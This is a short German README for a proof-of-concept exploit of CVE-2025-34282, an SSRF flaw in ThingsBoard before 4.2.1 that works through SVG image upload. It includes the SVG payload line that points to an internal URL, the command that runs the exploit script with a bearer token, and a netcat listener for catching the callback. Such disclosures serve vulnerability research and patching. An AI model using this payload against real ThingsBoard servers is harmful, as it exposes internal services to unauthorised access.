
PoC-Exploit für CVE-2025-34282 - ThingsBoard SSRF über SVG-Bild-Upload
Sicherheitslücke zur Server-Side Request Forgery (SSRF) in ThingsBoard IoT-Plattform-Versionen vor 4.2.1.
Ein Angreifer mit Tenant-Admin-Zugriff kann eine manipulierte SVG-Datei mit einer internen URL-Referenz über die Bild-Upload-Galerie hochladen. Wenn ThingsBoard das SVG serverseitig verarbeitet, ruft es die referenzierte URL ab – was den Zugriff auf interne Dienste ermöglicht, die nicht über das Internet erreichbar sind.
| Feld | Details |
|---|---|
| CVE | CVE-2025-34282 |
| Betroffene Version | < 4.2.1 |
| Behobene Version | 4.2.1 |
| CVSS-Score | 6.9 Mittel |
| CWE | CWE-918 (Server-Side Request Forgery) |
| Anbieter | https://thingsboard.io |
POST /api/image hoch
publicLink der SVG über ein <object>-Tag einbettet
Das ssrf_localhost_5555.svg-Payload bettet eine interne URL-Referenz ein:
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />
Nach dem Hochladen ruft der ThingsBoard-Server http://127.0.0.1:5555 ab, was die SSRF bestätigt.
Voraussetzungen:
pip install requests
Ausführen:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>
Beispiel:
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...
Starten Sie einen Listener, um den SSRF-Callback abzufangen, bevor Sie den Exploit ausführen:
nc -l 5555
Tamil Mathi T.